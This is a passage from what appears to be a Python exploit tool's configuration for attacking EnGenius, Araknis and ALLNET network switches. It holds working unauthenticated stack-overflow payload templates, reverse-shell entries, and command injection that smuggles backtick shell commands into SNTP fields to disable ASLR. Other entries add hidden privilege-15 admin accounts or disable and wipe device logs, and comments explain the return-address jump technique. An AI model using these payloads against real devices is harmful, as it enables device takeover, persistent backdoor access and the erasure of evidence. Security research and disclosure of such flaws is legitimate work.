workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in 
\"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'EnGenius': { \r\n\t\t\t\t'vendor': 'EnGenius Technologies, Inc.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'/loginMsg.js',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'',\r\n\t\t\t\t\t\t'disable_query':'',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'',\r\n\t\t\t\t\t\t'clean_logfile_query':'',\r\n\t\t\t\t\t\t'clean_logmem_uri':'',\r\n\t\t\t\t\t\t'clean_logmem_query':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': 
True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'security.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(280),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'datajson.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(288),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t'add_uri':'',\r\n\t\t\t\t\t\t'del_query':'',\r\n\t\t\t\t\t\t'del_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\t# <================================\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. 
We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Bonus: Disable and clean logs\r\n\t\t\t\t\t#\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) 
+'_CMD_',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&en=0',\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&ta=0',\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&ta=1',\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sn=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sn=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Used for both 'heap' and 'stack'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/security.cgi?logout',\r\n\t\t\t\t\t\t'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t#'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Araknis': { \r\n\t\t\t\t'vendor': 'Araknis Networks',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'/loginMsg.js',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'',\r\n\t\t\t\t\t\t'disable_query':'',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'',\r\n\t\t\t\t\t\t'clean_logfile_query':'',\r\n\t\t\t\t\t\t'clean_logmem_uri':'',\r\n\t\t\t\t\t\t'clean_logmem_query':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking 
authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'security.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(280),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'datajson.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(288),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t'add_uri':'',\r\n\t\t\t\t\t\t'del_query':'',\r\n\t\t\t\t\t\t'del_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\t# <================================\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. 
We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&en=0',\t\t\t\t# Disable Logging 
CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&ta=0',\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&ta=1',\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sn=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sn=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Used for both 'heap' and 'stack'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/security.cgi?logout',\r\n\t\t\t\t\t\t'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'ALLNET_JSON': { \r\n\t\t\t\t'vendor': 'ALLNET GmbH Computersysteme',\r\n\t\t\t\t'model':'ALL-SG82xx',\r\n\t\t\t\t'uri':'https://www.allnet.de/',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': 
True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': 